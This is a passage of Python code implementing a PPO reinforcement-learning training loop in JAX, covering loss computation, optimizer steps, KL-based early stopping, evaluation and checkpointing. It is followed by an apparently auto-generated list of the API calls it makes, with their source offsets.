lambda_=0.95,
epsilon=0.2,
c1=1.0,
c2=0.01,
rng=None):
"""Computes the combined (clipped loss + value loss) given observations."""
log_probab_actions_new, value_predictions_new = policy_and_value_net_apply(
padded_observations, new_params, rng=rng)
# (combined_loss, ppo_loss, value_loss, entropy_bonus)
return combined_loss_given_predictions(
log_probab_actions_new,
log_probab_actions_old,
value_predictions_new,
value_predictions_old,
padded_actions,
padded_rewards,
reward_mask,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon,
c1=c1,
c2=c2)
@functools.partial(jit, static_argnums=(2, 3, 4))
def policy_and_value_opt_step(i,
opt_state,
opt_update,
get_params,
policy_and_value_net_apply,
log_probab_actions_old,
value_predictions_old,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
c1=1.0,
c2=0.01,
gamma=0.99,
lambda_=0.95,
epsilon=0.1,
rng=None):
"""Policy and Value optimizer step."""
# Combined loss function given the new params.
def policy_and_value_loss(params):
"""Returns the combined loss given just parameters."""
(loss, _, _, _) = combined_loss(
params,
log_probab_actions_old,
value_predictions_old,
policy_and_value_net_apply,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
c1=c1,
c2=c2,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon,
rng=rng)
return loss
new_params = get_params(opt_state)
g = grad(policy_and_value_loss)(new_params)
# TODO(afrozm): Maybe clip gradients?
return opt_update(i, g, opt_state)
def get_time(t1, t2=None):
if t2 is None:
t2 = time.time()
return round((t2 - t1) * 1000, 2)
def approximate_kl(log_prob_new, log_prob_old, mask):
"""Computes the approximate KL divergence between the old and new log-probs.
Args:
log_prob_new: (B, T+1, A) log probs new
log_prob_old: (B, T+1, A) log probs old
mask: (B, T)
Returns:
Approximate KL.
"""
diff = log_prob_old - log_prob_new
# Cut the last time-step out.
diff = diff[:, :-1]
# Mask out the irrelevant part.
diff *= mask[:, :, np.newaxis] # make mask (B, T, 1)
# Average on non-masked part.
return np.sum(diff) / np.sum(mask)
def masked_entropy(log_probs, mask):
"""Computes the entropy for the given log-probs.
Args:
log_probs: (B, T+1, A) log probs
mask: (B, T) mask.
Returns:
Entropy.
"""
# Cut the last time-step out.
lp = log_probs[:, :-1]
# Mask out the irrelevant part.
lp *= mask[:, :, np.newaxis] # make mask (B, T, 1)
p = np.exp(lp) * mask[:, :, np.newaxis] # (B, T, 1)
# Average on non-masked part and take negative.
return -(np.sum(lp * p) / np.sum(mask))
def evaluate_policy(eval_env,
get_predictions,
boundary,
max_timestep=20000,
rng=None):
"""Evaluate the policy."""
avg_rewards = {}
for policy in [
env_problem_utils.CATEGORICAL_SAMPLING, env_problem_utils.GUMBEL_SAMPLING,
env_problem_utils.EPSILON_GREEDY
]:
trajs, _ = env_problem_utils.play_env_problem_with_policy(
eval_env,
get_predictions,
boundary=boundary,
max_timestep=max_timestep,
reset=True,
policy_sampling=policy,
rng=rng)
avg_rewards[policy] = float(sum(
np.sum(traj[2]) for traj in trajs)) / len(trajs)
return avg_rewards
def maybe_restore_params(output_dir, policy_and_value_net_params):
"""Maybe restore the params from the checkpoint dir.
Args:
output_dir: Directory where saved model checkpoints are stored.
policy_and_value_net_params: Default params, returned if model is'nt found.
Returns:
triple (restore (bool), params, iter(int)) where iter is the epoch from
which we restored the params, 0 is restore = False.
"""
model_files = gfile.glob(os.path.join(output_dir, "model-??????.pkl"))
if not model_files:
return False, policy_and_value_net_params, 0
model_file = sorted(model_files)[-1]
model_file_basename = os.path.basename(model_file) # model-??????.pkl
i = int(filter(str.isdigit, model_file_basename))
with gfile.GFile(model_file, "rb") as f:
policy_and_value_net_params = pickle.load(f)
return True, policy_and_value_net_params, i
def training_loop(
env=None,
epochs=EPOCHS,
policy_and_value_net_fun=None,
policy_and_value_optimizer_fun=None,
batch_size=BATCH_TRAJECTORIES,
num_optimizer_steps=NUM_OPTIMIZER_STEPS,
print_every_optimizer_steps=PRINT_EVERY_OPTIMIZER_STEP,
target_kl=0.01,
boundary=20,
max_timestep=None,
max_timestep_eval=20000,
random_seed=None,
gamma=GAMMA,
lambda_=LAMBDA,
epsilon=EPSILON,
c1=1.0,
c2=0.01,
output_dir=None,
eval_every_n=1000,
eval_env=None,
done_frac_for_policy_save=0.5,
enable_early_stopping=True,
env_name=None,
):
"""Runs the training loop for PPO, with fixed policy and value nets."""
assert env
assert output_dir
assert env_name
gfile.makedirs(output_dir)
# Create summary writers and history.
train_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "train"))
timing_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "timing"))
eval_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "eval"))
train_sw.text("env_name", env_name)
timing_sw.text("env_name", env_name)
eval_sw.text("env_name", env_name)
jax_rng_key = trax.get_random_number_generator_and_set_seed(random_seed)
# Batch Observations Shape = [-1, -1] + OBS, because we will eventually call
# policy and value networks on shape [B, T] +_OBS
batch_observations_shape = (-1, -1) + env.observation_space.shape
assert isinstance(env.action_space, gym.spaces.Discrete)
num_actions = env.action_space.n
jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2)
# Initialize the policy and value network.
policy_and_value_net_params, policy_and_value_net_apply = (
policy_and_value_net_fun(key1, batch_observations_shape, num_actions))
# Maybe restore the policy params. If there is nothing to restore, then
# iteration = 0 and policy_and_value_net_params are returned as is.
restore, policy_and_value_net_params, iteration = (
maybe_restore_params(output_dir, policy_and_value_net_params))
if restore:
logging.info("Restored parameters from iteration [%d]", iteration)
# We should start from the next iteration.
iteration += 1
policy_and_value_net_apply = jit(policy_and_value_net_apply)
# Initialize the optimizers.
policy_and_value_optimizer = (
policy_and_value_optimizer_fun(policy_and_value_net_params))
(policy_and_value_opt_state, policy_and_value_opt_update,
policy_and_value_get_params) = policy_and_value_optimizer
num_trajectories_done = 0
last_saved_at = 0
logging.info("Starting the PPO training loop.")
for i in range(iteration, epochs):
epoch_start_time = time.time()
# Params we'll use to collect the trajectories.
policy_and_value_net_params = policy_and_value_get_params(
policy_and_value_opt_state)
# A function to get the policy and value predictions.
def get_predictions(observations, rng=None):
"""Returns log-probs, value predictions and key back."""
key, key1 = jax_random.split(rng, num=2)
log_probs, value_preds = policy_and_value_net_apply(
observations, policy_and_value_net_params, rng=key1)
return log_probs, value_preds, key
# Evaluate the policy.
policy_eval_start_time = time.time()
if ((i + 1) % eval_every_n == 0) or (i == epochs - 1):
jax_rng_key, key = jax_random.split(jax_rng_key, num=2)
logging.vlog(1, "Epoch [% 6d] evaluating policy.", i)
avg_reward = evaluate_policy(
eval_env,
get_predictions,
boundary,
max_timestep=max_timestep_eval,
rng=key)
for k, v in avg_reward.items():
eval_sw.scalar("eval/mean_reward/%s" % k, v, step=i)
logging.info("Epoch [% 6d] Policy Evaluation [%s] = %10.2f", i, k, v)
policy_eval_time = get_time(policy_eval_start_time)
trajectory_collection_start_time = time.time()
logging.vlog(1, "Epoch [% 6d] collecting trajectories.", i)
jax_rng_key, key = jax_random.split(jax_rng_key)
trajs, num_done = collect_trajectories(
env,
policy_fun=get_predictions,
num_trajectories=batch_size,
max_timestep=max_timestep,
boundary=boundary,
rng=key,
reset=(i == 0) or restore,
epsilon=(10.0 / (i + 10.0))) # this is a different epsilon.
trajectory_collection_time = get_time(trajectory_collection_start_time)
logging.vlog(1, "Collecting trajectories took %0.2f msec.",
trajectory_collection_time)
avg_reward = float(sum(np.sum(traj[2]) for traj in trajs)) / len(trajs)
max_reward = max(np.sum(traj[2]) for traj in trajs)
min_reward = min(np.sum(traj[2]) for traj in trajs)
train_sw.scalar("train/mean_reward", avg_reward, step=i)
logging.vlog(1, "Rewards avg=[%0.2f], max=[%0.2f], min=[%0.2f], all=%s",
avg_reward, max_reward, min_reward,
[float(np.sum(traj[2])) for traj in trajs])
logging.vlog(1,
"Trajectory Length average=[%0.2f], max=[%0.2f], min=[%0.2f]",
float(sum(len(traj[0]) for traj in trajs)) / len(trajs),
max(len(traj[0]) for traj in trajs),
min(len(traj[0]) for traj in trajs))
logging.vlog(2, "Trajectory Lengths: %s", [len(traj[0]) for traj in trajs])
padding_start_time = time.time()
(_, reward_mask, padded_observations, padded_actions,
padded_rewards) = pad_trajectories(
trajs, boundary=boundary)
padding_time = get_time(padding_start_time)
logging.vlog(1, "Padding trajectories took %0.2f msec.",
get_time(padding_start_time))
logging.vlog(1, "Padded Observations' shape [%s]",
str(padded_observations.shape))
logging.vlog(1, "Padded Actions' shape [%s]", str(padded_actions.shape))
logging.vlog(1, "Padded Rewards' shape [%s]", str(padded_rewards.shape))
# Calculate log-probabilities and value predictions of the trajectories.
# We'll pass these to the loss functions so as to not get recomputed.
# NOTE:
# There is a slight problem here, if the policy network contains
# stochasticity in the log-probabilities (ex: dropout), then calculating
# these again here is not going to be correct and should be done in the
# collect function.
log_prob_recompute_start_time = time.time()
jax_rng_key, key = jax_random.split(jax_rng_key)
log_probabs_traj, value_predictions_traj, _ = get_predictions(
padded_observations, rng=key)
log_prob_recompute_time = get_time(log_prob_recompute_start_time)
# Some assertions.
B, T = padded_actions.shape # pylint: disable=invalid-name
assert (B, T) == padded_rewards.shape
assert (B, T) == reward_mask.shape
assert (B, T + 1) == padded_observations.shape[:2]
assert (B, T + 1) + env.observation_space.shape == padded_observations.shape
# Linear annealing from 0.1 to 0.0
# epsilon_schedule = epsilon if epochs == 1 else epsilon * (1.0 -
# (i /
# (epochs - 1)))
# Constant epsilon.
epsilon_schedule = epsilon
# Compute value and ppo losses.
jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2)
logging.vlog(2, "Starting to compute P&V loss.")
loss_compute_start_time = time.time()
cur_combined_loss, cur_ppo_loss, cur_value_loss, entropy_bonus = (
combined_loss(
policy_and_value_net_params,
log_probabs_traj,
value_predictions_traj,
policy_and_value_net_apply,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon_schedule,
c1=c1,
c2=c2,
rng=key1))
loss_compute_time = get_time(loss_compute_start_time)
logging.vlog(
1,
"Calculating P&V loss [%10.2f(%10.2f, %10.2f, %10.2f)] took %0.2f msec.",
cur_combined_loss, cur_value_loss, cur_ppo_loss, entropy_bonus,
get_time(loss_compute_start_time))
jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2)
logging.vlog(1, "Policy and Value Optimization")
optimization_start_time = time.time()
keys = jax_random.split(key1, num=num_optimizer_steps)
for j in range(num_optimizer_steps):
k1, k2, k3 = jax_random.split(keys[j], num=3)
t = time.time()
# Update the optimizer state.
policy_and_value_opt_state = policy_and_value_opt_step(
j,
policy_and_value_opt_state,
policy_and_value_opt_update,
policy_and_value_get_params,
policy_and_value_net_apply,
log_probabs_traj,
value_predictions_traj,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
c1=c1,
c2=c2,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon_schedule,
rng=k1)
# Compute the approx KL for early stopping.
new_policy_and_value_net_params = policy_and_value_get_params(
policy_and_value_opt_state)
log_probab_actions_new, _ = policy_and_value_net_apply(
padded_observations, new_policy_and_value_net_params, rng=k2)
approx_kl = approximate_kl(log_probab_actions_new, log_probabs_traj,
reward_mask)
early_stopping = enable_early_stopping and approx_kl > 1.5 * target_kl
if early_stopping:
logging.vlog(
1, "Early stopping policy and value optimization at iter: %d, "
"with approx_kl: %0.2f", j, approx_kl)
# We don't return right-away, we want the below to execute on the last
# iteration.
t2 = time.time()
if (((j + 1) % print_every_optimizer_steps == 0) or
(j == num_optimizer_steps - 1) or early_stopping):
# Compute and log the loss.
(loss_combined, loss_ppo, loss_value, entropy_bonus) = (
combined_loss(
new_policy_and_value_net_params,
log_probabs_traj,
value_predictions_traj,
policy_and_value_net_apply,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon_schedule,
c1=c1,
c2=c2,
rng=k3))
logging.vlog(1, "One Policy and Value grad desc took: %0.2f msec",
get_time(t, t2))
logging.vlog(
1, "Combined Loss(value, ppo, entropy_bonus) [%10.2f] ->"
" [%10.2f(%10.2f,%10.2f,%10.2f)]", cur_combined_loss, loss_combined,
loss_value, loss_ppo, entropy_bonus)
if early_stopping:
break
optimization_time = get_time(optimization_start_time)
logging.vlog(
1, "Total Combined Loss reduction [%0.2f]%%",
(100 * (cur_combined_loss - loss_combined) / np.abs(cur_combined_loss)))
# Save parameters every time we see the end of at least a fraction of batch
# number of trajectories that are done (not completed -- completed includes
# truncated and done).
# Also don't save too frequently, enforce a minimum gap.
# Or if this is the last iteration.
policy_save_start_time = time.time()
num_trajectories_done += num_done
if (((num_trajectories_done >= done_frac_for_policy_save * batch_size)
and (i - last_saved_at > eval_every_n)) or (i == epochs - 1)):
logging.vlog(1, "Epoch [% 6d] saving model.", i)
params_file = os.path.join(output_dir, "model-%06d.pkl" % i)
with gfile.GFile(params_file, "wb") as f:
pickle.dump(policy_and_value_net_params, f)
# Reset this number.
num_trajectories_done = 0
last_saved_at = i
policy_save_time = get_time(policy_save_start_time)
epoch_time = get_time(epoch_start_time)
logging.info(
"Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined"
" Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]", i, min_reward,
max_reward, avg_reward, loss_combined, loss_value, loss_ppo,
entropy_bonus)
timing_dict = {
"epoch": epoch_time,
"policy_eval": policy_eval_time,
"trajectory_collection": trajectory_collection_time,
"padding": padding_time,
"log_prob_recompute": log_prob_recompute_time,
"loss_compute": loss_compute_time,
"optimization": optimization_time,
"policy_save": policy_save_time,
}
for k, v in timing_dict.items():
timing_sw.scalar("timing/%s" % k, v, step=i)
max_key_len = max(len(k) for k in timing_dict)
timing_info_list = [
"%s : % 10.2f" % (k.rjust(max_key_len + 1), v)
for k, v in sorted(timing_dict.items())
]
logging.info("Epoch [% 6d], Timings: \n%s", i, "\n".join(timing_info_list))
# Reset restore.
restore = False
# Flush summary writers once in a while.
if (i+1) % 1000 == 0 or i == epochs - 1:
train_sw.flush()
timing_sw.flush()
eval_sw.flush()
| [
"jax.numpy.abs",
"tensor2tensor.trax.trax.get_random_number_generator_and_set_seed",
"absl.logging.info",
"tensor2tensor.trax.optimizers.Adam",
"jax.jit",
"jax.numpy.mean",
"jax.random.split",
"tensor2tensor.trax.layers.LogSoftmax",
"tensorflow.io.gfile.GFile",
"jax.numpy.std",
"absl.logging.vlog",
"jax.numpy.uint8",
"tensor2tensor.envs.env_problem_utils.play_env_problem_with_policy",
"jax.numpy.uint16",
"pickle.load",
"tensor2tensor.trax.layers.Dense",
"tensor2tensor.trax.layers.Serial",
"jax.numpy.clip",
"jax.numpy.stack",
"time.time",
"numpy.ones_like",
"pickle.dump",
"jax.numpy.arange",
"jax.numpy.exp",
"jax.lax.pad",
"os.path.join",
"jax.numpy.array",
"tensorflow.io.gfile.makedirs",
"jax.numpy.sum",
"jax.numpy.maximum",
"functools.partial",
"os.path.basename",
"jax.grad",
"jax.numpy.squeeze"
]
| [((20220, 20263), 'functools.partial', 'functools.partial', (['jit'], {'static_argnums': '(3,)'}), '(jit, static_argnums=(3,))\n', (20237, 20263), False, 'import functools\n'), ((21315, 21363), 'functools.partial', 'functools.partial', (['jit'], {'static_argnums': '(2, 3, 4)'}), '(jit, static_argnums=(2, 3, 4))\n', (21332, 21363), False, 'import functools\n'), ((3762, 3825), 'tensor2tensor.trax.optimizers.Adam', 'trax_opt.Adam', ([], {'step_size': 'step_size', 'b1': '(0.9)', 'b2': '(0.999)', 'eps': '(1e-08)'}), '(step_size=step_size, b1=0.9, b2=0.999, eps=1e-08)\n', (3775, 3825), True, 'from tensor2tensor.trax import optimizers as trax_opt\n'), ((5850, 6062), 'tensor2tensor.envs.env_problem_utils.play_env_problem_with_policy', 'env_problem_utils.play_env_problem_with_policy', (['env', 'policy_fun'], {'num_trajectories': 'num_trajectories', 'max_timestep': 'max_timestep', 'boundary': 'boundary', 'policy_sampling': 'policy', 'eps': 'epsilon', 'reset': 'reset', 'rng': 'rng'}), '(env, policy_fun,\n num_trajectories=num_trajectories, max_timestep=max_timestep, boundary=\n boundary, policy_sampling=policy, eps=epsilon, reset=reset, rng=rng)\n', (5896, 6062), False, 'from tensor2tensor.envs import env_problem_utils\n'), ((12385, 12421), 'jax.numpy.squeeze', 'np.squeeze', (['value_prediction'], {'axis': '(2)'}), '(value_prediction, axis=2)\n', (12395, 12421), True, 'from jax import numpy as np\n'), ((16885, 16933), 'jax.numpy.clip', 'np.clip', (['probab_ratios', '(1 - epsilon)', '(1 + epsilon)'], {}), '(probab_ratios, 1 - epsilon, 1 + epsilon)\n', (16892, 16933), True, 'from jax import numpy as np\n'), ((25327, 25355), 'os.path.basename', 'os.path.basename', (['model_file'], {}), '(model_file)\n', (25343, 25355), False, 'import os\n'), ((26310, 26336), 'tensorflow.io.gfile.makedirs', 'gfile.makedirs', (['output_dir'], {}), '(output_dir)\n', (26324, 26336), False, 'from tensorflow.io import gfile\n'), ((26723, 26781), 'tensor2tensor.trax.trax.get_random_number_generator_and_set_seed', 'trax.get_random_number_generator_and_set_seed', (['random_seed'], {}), '(random_seed)\n', (26768, 26781), False, 'from tensor2tensor.trax import trax\n'), ((27100, 27136), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {'num': '(2)'}), '(jax_rng_key, num=2)\n', (27116, 27136), True, 'from jax import random as jax_random\n'), ((27774, 27805), 'jax.jit', 'jit', (['policy_and_value_net_apply'], {}), '(policy_and_value_net_apply)\n', (27777, 27805), False, 'from jax import jit\n'), ((28111, 28158), 'absl.logging.info', 'logging.info', (['"""Starting the PPO training loop."""'], {}), "('Starting the PPO training loop.')\n", (28123, 28158), False, 'from absl import logging\n'), ((3260, 3281), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', (['*tower'], {}), '(*tower)\n', (3273, 3281), False, 'from tensor2tensor.trax import layers\n'), ((6385, 6396), 'jax.numpy.uint8', 'np.uint8', (['(0)'], {}), '(0)\n', (6393, 6396), True, 'from jax import numpy as np\n'), ((8773, 8814), 'jax.lax.pad', 'lax.pad', (['o', 'padding_value', 'padding_config'], {}), '(o, padding_value, padding_config)\n', (8780, 8814), False, 'from jax import lax\n'), ((8997, 9045), 'jax.lax.pad', 'lax.pad', (['a', 'action_padding_value', 'padding_config'], {}), '(a, action_padding_value, padding_config)\n', (9004, 9045), False, 'from jax import lax\n'), ((9107, 9155), 'jax.lax.pad', 'lax.pad', (['r', 'reward_padding_value', 'padding_config'], {}), '(r, reward_padding_value, padding_config)\n', (9114, 9155), False, 'from jax import lax\n'), ((9257, 9289), 'numpy.ones_like', 'onp.ones_like', (['r'], {'dtype': 'np.int32'}), '(r, dtype=np.int32)\n', (9270, 9289), True, 'import numpy as onp\n'), ((9381, 9403), 'jax.numpy.stack', 'np.stack', (['reward_masks'], {}), '(reward_masks)\n', (9389, 9403), True, 'from jax import numpy as np\n'), ((9405, 9434), 'jax.numpy.stack', 'np.stack', (['padded_observations'], {}), '(padded_observations)\n', (9413, 9434), True, 'from jax import numpy as np\n'), ((9443, 9467), 'jax.numpy.stack', 'np.stack', (['padded_actions'], {}), '(padded_actions)\n', (9451, 9467), True, 'from jax import numpy as np\n'), ((9469, 9493), 'jax.numpy.stack', 'np.stack', (['padded_rewards'], {}), '(padded_rewards)\n', (9477, 9493), True, 'from jax import numpy as np\n'), ((11201, 11223), 'jax.numpy.stack', 'np.stack', (['r2gs'], {'axis': '(1)'}), '(r2gs, axis=1)\n', (11209, 11223), True, 'from jax import numpy as np\n'), ((12714, 12754), 'jax.numpy.squeeze', 'np.squeeze', (['value_prediction_old'], {'axis': '(2)'}), '(value_prediction_old, axis=2)\n', (12724, 12754), True, 'from jax import numpy as np\n'), ((13017, 13049), 'jax.numpy.maximum', 'np.maximum', (['v_clipped_loss', 'loss'], {}), '(v_clipped_loss, loss)\n', (13027, 13049), True, 'from jax import numpy as np\n'), ((13116, 13128), 'jax.numpy.sum', 'np.sum', (['loss'], {}), '(loss)\n', (13122, 13128), True, 'from jax import numpy as np\n'), ((13131, 13150), 'jax.numpy.sum', 'np.sum', (['reward_mask'], {}), '(reward_mask)\n', (13137, 13150), True, 'from jax import numpy as np\n'), ((16715, 16742), 'jax.numpy.exp', 'np.exp', (['(logp_new - logp_old)'], {}), '(logp_new - logp_old)\n', (16721, 16742), True, 'from jax import numpy as np\n'), ((18091, 18132), 'jax.numpy.squeeze', 'np.squeeze', (['value_predictions_old'], {'axis': '(2)'}), '(value_predictions_old, axis=2)\n', (18101, 18132), True, 'from jax import numpy as np\n'), ((18392, 18410), 'jax.numpy.std', 'np.std', (['advantages'], {}), '(advantages)\n', (18398, 18410), True, 'from jax import numpy as np\n'), ((18764, 18781), 'jax.numpy.sum', 'np.sum', (['objective'], {}), '(objective)\n', (18770, 18781), True, 'from jax import numpy as np\n'), ((18784, 18803), 'jax.numpy.sum', 'np.sum', (['reward_mask'], {}), '(reward_mask)\n', (18790, 18803), True, 'from jax import numpy as np\n'), ((22735, 22762), 'jax.grad', 'grad', (['policy_and_value_loss'], {}), '(policy_and_value_loss)\n', (22739, 22762), False, 'from jax import grad\n'), ((22907, 22918), 'time.time', 'time.time', ([], {}), '()\n', (22916, 22918), False, 'import time\n'), ((23464, 23476), 'jax.numpy.sum', 'np.sum', (['diff'], {}), '(diff)\n', (23470, 23476), True, 'from jax import numpy as np\n'), ((23479, 23491), 'jax.numpy.sum', 'np.sum', (['mask'], {}), '(mask)\n', (23485, 23491), True, 'from jax import numpy as np\n'), ((23833, 23843), 'jax.numpy.exp', 'np.exp', (['lp'], {}), '(lp)\n', (23839, 23843), True, 'from jax import numpy as np\n'), ((24351, 24523), 'tensor2tensor.envs.env_problem_utils.play_env_problem_with_policy', 'env_problem_utils.play_env_problem_with_policy', (['eval_env', 'get_predictions'], {'boundary': 'boundary', 'max_timestep': 'max_timestep', 'reset': '(True)', 'policy_sampling': 'policy', 'rng': 'rng'}), '(eval_env, get_predictions,\n boundary=boundary, max_timestep=max_timestep, reset=True,\n policy_sampling=policy, rng=rng)\n', (24397, 24523), False, 'from tensor2tensor.envs import env_problem_utils\n'), ((25146, 25190), 'os.path.join', 'os.path.join', (['output_dir', '"""model-??????.pkl"""'], {}), "(output_dir, 'model-??????.pkl')\n", (25158, 25190), False, 'import os\n'), ((25435, 25464), 'tensorflow.io.gfile.GFile', 'gfile.GFile', (['model_file', '"""rb"""'], {}), "(model_file, 'rb')\n", (25446, 25464), False, 'from tensorflow.io import gfile\n'), ((25505, 25519), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (25516, 25519), False, 'import pickle\n'), ((26414, 26447), 'os.path.join', 'os.path.join', (['output_dir', '"""train"""'], {}), "(output_dir, 'train')\n", (26426, 26447), False, 'import os\n'), ((26486, 26520), 'os.path.join', 'os.path.join', (['output_dir', '"""timing"""'], {}), "(output_dir, 'timing')\n", (26498, 26520), False, 'import os\n'), ((26557, 26589), 'os.path.join', 'os.path.join', (['output_dir', '"""eval"""'], {}), "(output_dir, 'eval')\n", (26569, 26589), False, 'import os\n'), ((27609, 27675), 'absl.logging.info', 'logging.info', (['"""Restored parameters from iteration [%d]"""', 'iteration'], {}), "('Restored parameters from iteration [%d]', iteration)\n", (27621, 27675), False, 'from absl import logging\n'), ((28219, 28230), 'time.time', 'time.time', ([], {}), '()\n', (28228, 28230), False, 'import time\n'), ((28823, 28834), 'time.time', 'time.time', ([], {}), '()\n', (28832, 28834), False, 'import time\n'), ((29455, 29466), 'time.time', 'time.time', ([], {}), '()\n', (29464, 29466), False, 'import time\n'), ((29471, 29530), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Epoch [% 6d] collecting trajectories."""', 'i'], {}), "(1, 'Epoch [% 6d] collecting trajectories.', i)\n", (29483, 29530), False, 'from absl import logging\n'), ((29554, 29583), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {}), '(jax_rng_key)\n', (29570, 29583), True, 'from jax import random as jax_random\n'), ((29978, 30069), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Collecting trajectories took %0.2f msec."""', 'trajectory_collection_time'], {}), "(1, 'Collecting trajectories took %0.2f msec.',\n trajectory_collection_time)\n", (29990, 30069), False, 'from absl import logging\n'), ((30915, 30926), 'time.time', 'time.time', ([], {}), '()\n', (30924, 30926), False, 'import time\n'), ((31924, 31935), 'time.time', 'time.time', ([], {}), '()\n', (31933, 31935), False, 'import time\n'), ((31959, 31988), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {}), '(jax_rng_key)\n', (31975, 31988), True, 'from jax import random as jax_random\n'), ((32845, 32881), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {'num': '(2)'}), '(jax_rng_key, num=2)\n', (32861, 32881), True, 'from jax import random as jax_random\n'), ((32886, 32934), 'absl.logging.vlog', 'logging.vlog', (['(2)', '"""Starting to compute P&V loss."""'], {}), "(2, 'Starting to compute P&V loss.')\n", (32898, 32934), False, 'from absl import logging\n'), ((32965, 32976), 'time.time', 'time.time', ([], {}), '()\n', (32974, 32976), False, 'import time\n'), ((33794, 33830), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {'num': '(2)'}), '(jax_rng_key, num=2)\n', (33810, 33830), True, 'from jax import random as jax_random\n'), ((33835, 33883), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Policy and Value Optimization"""'], {}), "(1, 'Policy and Value Optimization')\n", (33847, 33883), False, 'from absl import logging\n'), ((33914, 33925), 'time.time', 'time.time', ([], {}), '()\n', (33923, 33925), False, 'import time\n'), ((33937, 33984), 'jax.random.split', 'jax_random.split', (['key1'], {'num': 'num_optimizer_steps'}), '(key1, num=num_optimizer_steps)\n', (33953, 33984), True, 'from jax import random as jax_random\n'), ((37087, 37098), 'time.time', 'time.time', ([], {}), '()\n', (37096, 37098), False, 'import time\n'), ((37695, 37934), 'absl.logging.info', 'logging.info', (['"""Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]"""', 'i', 'min_reward', 'max_reward', 'avg_reward', 'loss_combined', 'loss_value', 'loss_ppo', 'entropy_bonus'], {}), "(\n 'Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]'\n , i, min_reward, max_reward, avg_reward, loss_combined, loss_value,\n loss_ppo, entropy_bonus)\n", (37707, 37934), False, 'from absl import logging\n'), ((3566, 3588), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', (['*tower1'], {}), '(*tower1)\n', (3579, 3588), False, 'from tensor2tensor.trax import layers\n'), ((3598, 3620), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', (['*tower2'], {}), '(*tower2)\n', (3611, 3620), False, 'from tensor2tensor.trax import layers\n'), ((6444, 6456), 'jax.numpy.uint16', 'np.uint16', (['(0)'], {}), '(0)\n', (6453, 6456), True, 'from jax import numpy as np\n'), ((9314, 9353), 'jax.lax.pad', 'lax.pad', (['reward_mask', '(0)', 'padding_config'], {}), '(reward_mask, 0, padding_config)\n', (9321, 9353), False, 'from jax import lax\n'), ((12887, 12954), 'jax.numpy.clip', 'np.clip', (['(value_prediction - value_prediction_old)', '(-epsilon)', 'epsilon'], {}), '(value_prediction - value_prediction_old, -epsilon, epsilon)\n', (12894, 12954), True, 'from jax import numpy as np\n'), ((14032, 14043), 'jax.numpy.array', 'np.array', (['d'], {}), '(d)\n', (14040, 14043), True, 'from jax import numpy as np\n'), ((15596, 15608), 'jax.numpy.arange', 'np.arange', (['T'], {}), '(T)\n', (15605, 15608), True, 'from jax import numpy as np\n'), ((18369, 18388), 'jax.numpy.mean', 'np.mean', (['advantages'], {}), '(advantages)\n', (18376, 18388), True, 'from jax import numpy as np\n'), ((23943, 23957), 'jax.numpy.sum', 'np.sum', (['(lp * p)'], {}), '(lp * p)\n', (23949, 23957), True, 'from jax import numpy as np\n'), ((23960, 23972), 'jax.numpy.sum', 'np.sum', (['mask'], {}), '(mask)\n', (23966, 23972), True, 'from jax import numpy as np\n'), ((28572, 28600), 'jax.random.split', 'jax_random.split', (['rng'], {'num': '(2)'}), '(rng, num=2)\n', (28588, 28600), True, 'from jax import random as jax_random\n'), ((28919, 28955), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {'num': '(2)'}), '(jax_rng_key, num=2)\n', (28935, 28955), True, 'from jax import random as jax_random\n'), ((28963, 29016), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Epoch [% 6d] evaluating policy."""', 'i'], {}), "(1, 'Epoch [% 6d] evaluating policy.', i)\n", (28975, 29016), False, 'from absl import logging\n'), ((34045, 34077), 'jax.random.split', 'jax_random.split', (['keys[j]'], {'num': '(3)'}), '(keys[j], num=3)\n', (34061, 34077), True, 'from jax import random as jax_random\n'), ((34088, 34099), 'time.time', 'time.time', ([], {}), '()\n', (34097, 34099), False, 'import time\n'), ((35450, 35461), 'time.time', 'time.time', ([], {}), '()\n', (35459, 35461), False, 'import time\n'), ((37290, 37338), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Epoch [% 6d] saving model."""', 'i'], {}), "(1, 'Epoch [% 6d] saving model.', i)\n", (37302, 37338), False, 'from absl import logging\n'), ((37359, 37405), 'os.path.join', 'os.path.join', (['output_dir', "('model-%06d.pkl' % i)"], {}), "(output_dir, 'model-%06d.pkl' % i)\n", (37371, 37405), False, 'import os\n'), ((3446, 3471), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', (['num_actions'], {}), '(num_actions)\n', (3458, 3471), False, 'from tensor2tensor.trax import layers\n'), ((3473, 3492), 